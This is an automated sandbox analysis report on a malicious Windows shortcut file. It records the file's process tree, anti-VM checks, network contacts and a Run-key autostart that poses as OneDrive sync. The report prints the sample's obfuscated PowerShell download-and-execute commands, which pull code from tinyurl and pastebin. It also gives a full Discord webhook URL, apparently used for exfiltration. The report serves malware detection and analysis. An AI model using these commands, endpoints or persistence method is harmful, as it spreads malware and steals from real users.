Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1313
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2024
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4355
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5466
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 605
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 358
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3364
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 685
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 Thread sleep count: 1313 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604 Thread sleep count: 2024 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep count: 141 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep count: 4355 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 5466 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep count: 605 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996 Thread sleep count: 138 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 358 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228 Thread sleep count: 3364 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264 Thread sleep count: 6344 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep count: 815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep count: 685 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672 Thread sleep count: 189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276 Thread sleep count: 6020 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916 Thread sleep count: 3745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: powershell.exe, 0000000F.00000002.2046840089.00000246BBC80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: powershell.exe, 00000004.00000002.1780221585.0000012AE31E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1951884074.000001B43695E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
MITRE ATT&CK Matrix (numbers preceding a technique name are carried over from the matrix cells as extracted)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: 1 Spearphishing Link; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 111 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 111 Security Software Discovery; 11 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (rendered as an image in the original report; the information recoverable from it follows)

Behavior Graph ID: 1534106 | Sample: BeginSync lnk.lnk | Start date: 15/10/2024 | Architecture: WINDOWS | Score: 96
Root-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; 3 other signatures; Connects to a pastebin service (likely for C&C), attached to pastebin.com
Root-level network nodes: pastebin.com; tinyurl.com; 2 other IPs or domains
Process tree: three forfiles.exe instances are started from the sample; each starts a powershell.exe and a conhost.exe (forfiles.exe carries the signatures "Windows shortcut file (LNK) starts blacklisted processes" and "Suspicious powershell command line found"). The first of those powershell.exe processes carries "Windows shortcut file (LNK) starts blacklisted processes", "Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)", "Suspicious powershell command line found" and "Powershell creates an autostart link". Each first-level powershell.exe starts a further powershell.exe.
Second-level powershell.exe (from the first chain): contacts raw.githubusercontent.com (185.199.111.133, 443, 49703, 49704, FASTLYUS, Netherlands), tinyurl.com (104.18.111.161, 49701, 80, CLOUDFLARENETUS, United States) and 2 other IPs or domains; drops C:\ProgramData\...\BeginSync.lnk (MS); carries "Tries to open files direct via NTFS file id"; starts attrib.exe.
Second-level powershell.exe (from the second chain): contacts 172.67.19.24 (443, 49716, 49717, CLOUDFLARENETUS, United States).

Source | Detection | Scanner | Label | Link
BeginSync lnk.lnk | 5% | ReversingLabs | |
BeginSync lnk.lnk | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tinyurl.com | 104.18.111.161 | true | true | | unknown
discord.com | 162.159.137.232 | true | true | | unknown
raw.githubusercontent.com | 185.199.111.133 | true | true | | unknown
pastebin.com | 104.20.3.235 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://tinyurl.com/yeykydun | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
http://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com | powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A0000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 00000004.00000002.1746329088.0000012ACC60C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F10E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.1746329088.0000012ACB767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://discord.com/ | powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://discord.com | powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtQ | powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://discord.com/api/webhooks/128545359042878 | powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://0.discor | powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com | powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tinyurl.com | powershell.exe, 00000004.00000002.1746329088.0000012ACC167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://raw.githubusercontent.com | powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42C9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://raw.githubuserconte | powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E59D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A382D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E5C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://0.discord.com/ | powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pastebin.com | powershell.exe, 00000004.00000002.1746329088.0000012ACC500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EF9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4248000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://pastebin.com | powershell.exe, 00000004.00000002.1746329088.0000012ACB275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4238000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
172.67.19.24 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.18.111.161 | tinyurl.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534106
Start date and time: 2024-10-15 15:52:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BeginSync lnk.lnk
Detection: MAL
Classification: mal96.troj.evad.winLNK@20/15@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 8
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                          • VT rate limit hit for: BeginSync lnk.lnk
Time | Type | Description
09:53:22 | API Interceptor | 510x Sleep call for process: powershell.exe modified
15:53:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
15:53:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | 2024 12_59_31 a.m..js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
